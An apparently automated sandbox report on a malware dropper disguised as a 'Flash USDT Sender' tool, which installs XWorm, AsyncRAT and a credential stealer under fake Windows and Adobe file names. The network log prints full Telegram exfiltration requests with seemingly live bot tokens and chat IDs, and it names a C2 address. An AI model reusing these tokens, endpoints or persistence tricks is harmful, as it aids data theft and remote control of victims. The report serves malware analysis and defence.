File name:	01f20bc6aeea3f99b634c203f16d3eb6298ed184c824cffdd16895385922bde5N
Full analysis:	https://app.any.run/tasks/2baef06b-ca6d-4e73-b6ac-c1433a7a8431
Verdict:	Malicious activity
Threats:	AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails. XWorm ist ein Remote Access Trojaner (RAT), der als Malware-as-a-Service verkauft wird. Er verfügt über ein umfangreiches Hacking-Toolset und ist in der Lage, private Informationen und Dateien auf dem infizierten Computer zu sammeln, MetaMask- und Telegram-Konten zu kapern und Benutzeraktivitäten zu verfolgen. XWorm wird in der Regel durch mehrstufige Angriffe auf die Computer der Opfer übertragen, die mit Phishing-E-Mails beginnen. Malware Trends Tracker >>>
Analysis date:	October 08, 2024, 21:17:35
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	telegram crypto-regex xworm ims-api generic remote evasion stormkitty stealer worldwind arch-doc asyncrat
Indicators:
MIME:	application/x-dosexec
File info:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5:	46FEDA17E80F3D49DA421376B8ED69F0
SHA1:	7F07A79D769261A5D51D5D74D878B2DC231EB6D2
SHA256:	01F20BC6AEEA3F99B634C203F16D3EB6298ED184C824CFFDD16895385922BDE5
SSDEEP:	49152:gIe1IsbNZZ0QnP/jnUZ+vRXwMHV+q5tE1yi3hWYMZ+yw0uY8/hFeDrbHHFpG06kp:gRIsbbTXjnUZ+vRvkktEcChWFZ+ODrY

.exe	\|	Generic CIL Executable (.NET, Mono, etc.) (63.1)
.exe	\|	Win64 Executable (generic) (23.8)
.dll	\|	Win32 Dynamic Link Library (generic) (5.6)
.exe	\|	Win32 Executable (generic) (3.8)
.exe	\|	Generic Win/DOS Executable (1.7)

MachineType:	Intel 386 or later, and compatibles
TimeStamp:	2024:09:25 21:28:04+00:00
ImageFileCharacteristics:	Executable, 32-bit
PEType:	PE32
LinkerVersion:	11
CodeSize:	1189888
InitializedDataSize:	111104
UninitializedDataSize:	-
EntryPoint:	0x12479e
OSVersion:	4
ImageVersion:	-
SubsystemVersion:	4
Subsystem:	Windows GUI
FileVersionNumber:	1.0.0.0
ProductVersionNumber:	1.0.0.0
FileFlagsMask:	0x003f
FileFlags:	(none)
FileOS:	Win32
ObjectFileType:	Executable application
FileSubtype:	-
LanguageCode:	Neutral
CharacterSet:	Unicode
FileDescription:	Flash USDT Sender
FileVersion:	1.0.0.0
InternalName:	Output.exe
LegalCopyright:	Copyright © 2022
OriginalFileName:	Output.exe
ProductName:	Flash USDT Sender
ProductVersion:	1.0.0.0
AssemblyVersion:	1.0.0.0


(PID) Process:	(6952) AdobeUpdate.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:	write	Name:	AdobeUpdate
Value: C:\Users\admin\AppData\Roaming\AdobeUpdate.exe
(PID) Process:	(6800) Cracked.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:	write	Name:	Windows Security Health Service
Value: "C:\Users\admin\AppData\Roaming\Windows Security Health Service.exe"
(PID) Process:	(5276) Windows Defender Service.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:	write	Name:	Windows Defender Service
Value: C:\Users\admin\AppData\Roaming\Windows Defender Service.exe
(PID) Process:	(512) crack.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\crack_RASAPI32
Operation:	write	Name:	EnableFileTracing
Value: 0
(PID) Process:	(512) crack.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\crack_RASAPI32
Operation:	write	Name:	EnableAutoFileTracing
Value: 0
(PID) Process:	(512) crack.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\crack_RASAPI32
Operation:	write	Name:	EnableConsoleTracing
Value: 0
(PID) Process:	(512) crack.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\crack_RASAPI32
Operation:	write	Name:	FileTracingMask
Value:
(PID) Process:	(512) crack.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\crack_RASAPI32
Operation:	write	Name:	ConsoleTracingMask
Value:
(PID) Process:	(512) crack.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\crack_RASAPI32
Operation:	write	Name:	MaxFileSize
Value: 1048576
(PID) Process:	(512) crack.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\crack_RASAPI32
Operation:	write	Name:	FileDirectory
Value: %windir%\tracing

PID	Process	Filename		Type
6660	01f20bc6aeea3f99b634c203f16d3eb6298ed184c824cffdd16895385922bde5N.exe	C:\Users\admin\AppData\Roaming\svchost.exe		executable
		MD5:96014694A042D8344B910BC47D79337B	SHA256:4950EB74909BD6E739E38E57D8C6465C76EF108D65CAC9F130D3F5C6D2FE943F
6660	01f20bc6aeea3f99b634c203f16d3eb6298ed184c824cffdd16895385922bde5N.exe	C:\Users\admin\AppData\Roaming\Windows Defender Service.exe		executable
		MD5:D536D6AF55D6FDD40603AA188302FEA0	SHA256:765F25E12378795AEF83491F0AAB228E0B20F1BE973DD7AAC44608FDDB334BCE
6660	01f20bc6aeea3f99b634c203f16d3eb6298ed184c824cffdd16895385922bde5N.exe	C:\Users\admin\AppData\Roaming\crack.exe		executable
		MD5:9215015740C937980B6B53CEE5087769	SHA256:A5390A297F14EF8F5BE308009EC436D2A58598188DBB92D7299795A10BA1C541
6660	01f20bc6aeea3f99b634c203f16d3eb6298ed184c824cffdd16895385922bde5N.exe	C:\Users\admin\AppData\Roaming\Cracked.exe		executable
		MD5:0DFA83A82F6418C73406D78296DE61BE	SHA256:8D27369FFA8B29D561FA9DAF485BE14D2FC00287BB1C69D4C84D514891C8DB5E
6800	Cracked.exe	C:\Users\admin\AppData\Roaming\Windows Security Health Service.exe		executable
		MD5:0DFA83A82F6418C73406D78296DE61BE	SHA256:8D27369FFA8B29D561FA9DAF485BE14D2FC00287BB1C69D4C84D514891C8DB5E
6660	01f20bc6aeea3f99b634c203f16d3eb6298ed184c824cffdd16895385922bde5N.exe	C:\Users\admin\AppData\Roaming\Flash USDT Sender.exe		executable
		MD5:AC7938B542469A1C5BB108FC046AC87B	SHA256:1EFD1DE7AEF995821042509C66121A942C7EE8E004BADBB4E14A10B5D7C96292
5508	svchost.exe	C:\Users\admin\AppData\Local\585a29ccb90b035de5dc9a9484f7c433\admin@DESKTOP-JGLLJLD_en-US\Grabber\DRIVE-C\Users\admin\Pictures\desktop.ini		text
		MD5:29EAE335B77F438E05594D86A6CA22FF	SHA256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
6660	01f20bc6aeea3f99b634c203f16d3eb6298ed184c824cffdd16895385922bde5N.exe	C:\Users\admin\AppData\Roaming\AdobeUpdate.exe		executable
		MD5:BB2F6EC73B6646FB1D674763A060B42B	SHA256:0F5C554A665E05341D97FFBE3B7FACBCB2043E50D079457FC54CD762CDEB11DE
6800	Cracked.exe	C:\Users\admin\AppData\Roaming\MyData\DataLogs.conf		text
		MD5:CF759E4C5F14FE3EEC41B87ED756CEA8	SHA256:C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
6660	01f20bc6aeea3f99b634c203f16d3eb6298ed184c824cffdd16895385922bde5N.exe	C:\Users\admin\AppData\Roaming\windows update.exe		executable
		MD5:74EAB303BC6B579831E076CCAD9F29C6	SHA256:533CFE737CD440C7F9A65D7B47C0F082886D50BCEBFF287F922A27F4D10F77F0

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
6944	svchost.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
5488	MoUsoCoreWorker.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
4080	RUXIMICS.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
5508	svchost.exe	GET	200	104.16.185.241:80	http://icanhazip.com/	unknown	—	—	shared
—	—	POST	204	184.86.251.7:443	https://www.bing.com/threshold/xls.aspx	unknown	—	—	whitelisted
—	—	GET	200	149.154.167.99:443	https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP	unknown	binary	300 b	whitelisted
—	—	GET	200	149.154.167.99:443	https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Stealer%202.0.4%20-%20Results:%0ADate:%202024-10-08%209:17:53%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20admin%0ACompName:%20DESKTOP-JGLLJLD%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)%20i5-6400%20CPU%20@%202.70GHz%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%204090MB%0AHWID:%20078BFBFF000506E3%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.100.2%0AInternal%20IP:%20192.168.100.41%0AExternal%20IP:%2077.137.76.56%0ABSSID:%2052:54:00:36:3e:ff%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%202%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2012%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%204%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True	unknown	binary	2.02 Kb	whitelisted
—	—	GET	200	149.154.167.99:443	https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders...	unknown	binary	251 b	whitelisted
—	—	GET	200	149.154.167.99:443	https://api.telegram.org/bot7308504158:AAGvjg5ZWkkItSzfmQZs_qu73xKZ_gWVkJI/sendMessage?chat_id=6291749148&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3C54740F7CC0F23B53E5%0D%0A%0D%0AUserName%20:%20admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20%20i5-6400%20%20@%202.70GHz%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%203.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2	unknown	binary	450 b	whitelisted
—	—	GET	200	172.67.196.114:443	https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=52:54:00:36:3e:ff	unknown	binary	88 b	unknown

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:138	—	—	—	whitelisted
6944	svchost.exe	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4080	RUXIMICS.exe	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
5488	MoUsoCoreWorker.exe	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4080	RUXIMICS.exe	184.30.21.171:80	www.microsoft.com	AKAMAI-AS	DE	whitelisted
5488	MoUsoCoreWorker.exe	184.30.21.171:80	www.microsoft.com	AKAMAI-AS	DE	whitelisted
6944	svchost.exe	184.30.21.171:80	www.microsoft.com	AKAMAI-AS	DE	whitelisted
7152	Windows Security Health Service.exe	185.252.232.158:7812	—	Contabo GmbH	DE	malicious
4020	svchost.exe	239.255.255.250:1900	—	—	—	whitelisted
512	crack.exe	149.154.167.220:443	api.telegram.org	Telegram Messenger Inc	GB	shared

Domain	IP	Reputation
settings-win.data.microsoft.com	51.124.78.146	whitelisted
google.com	142.250.185.238	whitelisted
www.microsoft.com	184.30.21.171	whitelisted
api.telegram.org	149.154.167.220	shared
www.bing.com	184.86.251.22 184.86.251.9 184.86.251.27 184.86.251.19 184.86.251.21 184.86.251.7	whitelisted
icanhazip.com	104.16.185.241 104.16.184.241	shared
api.mylnikov.org	104.21.44.66 172.67.196.114	unknown
self.events.data.microsoft.com	20.42.65.84	whitelisted

PID	Process	Class	Message
2172	svchost.exe	Misc activity	ET HUNTING Telegram API Domain in DNS Lookup
512	crack.exe	Misc activity	ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
512	crack.exe	Misc activity	ET HUNTING Telegram API Certificate Observed
—	—	Misc activity	ET HUNTING Telegram API Request (GET)
—	—	A Network Trojan was detected	ET MALWARE Rezlt RDP Grabber - This is Not RDP
—	—	A Network Trojan was detected	ET MALWARE MSIL/Spyware Activity via Telegram (Response)
5276	Windows Defender Service.exe	Misc activity	ET HUNTING Telegram API Certificate Observed
5276	Windows Defender Service.exe	Misc activity	ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
—	—	Misc activity	ET HUNTING Telegram API Request (GET)
5276	Windows Defender Service.exe	Malware Command and Control Activity Detected	REMOTE [ANY.RUN] Xworm TCP Packet

General Info

01f20bc6aeea3f99b634c203f16d3eb6298ed184c824cffdd16895385922bde5N

46FEDA17E80F3D49DA421376B8ED69F0

7F07A79D769261A5D51D5D74D878B2DC231EB6D2

01F20BC6AEEA3F99B634C203F16D3EB6298ED184C824CFFDD16895385922BDE5

49152:gIe1IsbNZZ0QnP/jnUZ+vRXwMHV+q5tE1yi3hWYMZ+yw0uY8/hFeDrbHHFpG06kp:gRIsbbTXjnUZ+vRvkktEcChWFZ+ODrY

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Changes the autorun value in the registry

Create files in the Startup directory

Uses Task Scheduler to run other applications

XWORM has been detected (YARA)

XWORM has been detected (SURICATA)

STORMKITTY has been detected (YARA)

ASYNCRAT has been detected (YARA)

SUSPICIOUS

Reads security settings of Internet Explorer

Reads the date of Windows installation

The process creates files with name similar to system file names

Probably fake Windows Update file has been dropped

Executable content was dropped or overwritten

Probably fake Windows Update

Executing commands from a ".bat" file

Starts CMD.EXE for commands execution

Uses TIMEOUT.EXE to delay execution

The executable file from the user directory is run by the CMD process

Found regular expressions for crypto-addresses (YARA)

Process communicates with Telegram (possibly using it as an attacker's C2 server)

Connects to unusual port

Executing commands from ".cmd" file

Possible usage of Discord/Telegram API has been detected (YARA)

Uses NETSH.EXE to obtain data on the network

Starts application with an unusual extension

Contacting a server suspected of hosting an CnC

Using 'findstr.exe' to search for text patterns in files and output

Checks for external IP

Potential Corporate Privacy Violation

INFO

Checks supported languages

Creates files or folders in the user directory

Reads the machine GUID from the registry

Reads the computer name

Process checks computer location settings

The process uses the downloaded file

Reads Environment values

Create files in a temporary directory

Disables trace logs

Attempting to use instant messaging service

Changes the display of characters in the console

Manual execution by a user

Malware configuration

XWorm

ims-api

StormKitty

AsyncRat

Static information

TRiD

EXIF

EXE

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules